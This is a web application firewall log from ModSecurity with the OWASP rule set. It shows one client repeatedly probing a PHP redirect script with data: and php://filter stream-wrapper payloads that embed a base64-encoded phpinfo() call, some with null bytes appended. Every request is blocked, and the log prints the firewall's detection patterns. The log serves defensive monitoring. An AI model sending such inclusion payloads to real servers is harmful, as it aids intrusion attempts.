[Tue May 12 05:36:49.523905 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
[Tue May 12 05:36:49.524333 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
[Tue May 12 05:36:49.524569 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
[Tue May 12 05:36:49.762129 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjAAAAFY"]
[Tue May 12 05:36:49.762223 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjAAAAFY"]
[Tue May 12 05:36:49.762632 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjAAAAFY"]
[Tue May 12 05:36:49.762857 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjAAAAFY"]
[Tue May 12 05:36:49.999702 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:49.999740 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:50.000070 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:50.000146 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:50.000498 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:50.000687 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihjQAAAFY"]
[Tue May 12 05:36:50.238256 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjgAAAFY"]
[Tue May 12 05:36:50.238423 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjgAAAFY"]
[Tue May 12 05:36:50.238961 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjgAAAFY"]
[Tue May 12 05:36:50.239198 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjgAAAFY"]
[Tue May 12 05:36:50.476209 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.476249 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.476480 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.476602 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.477066 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.477256 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihjwAAAFY"]
[Tue May 12 05:36:50.714715 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkAAAAFY"]
[Tue May 12 05:36:50.714877 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkAAAAFY"]
[Tue May 12 05:36:50.715372 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkAAAAFY"]
[Tue May 12 05:36:50.715619 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkAAAAFY"]
[Tue May 12 05:36:50.952851 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
[Tue May 12 05:36:50.952921 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
[Tue May 12 05:36:50.953222 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
[Tue May 12 05:36:50.953361 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
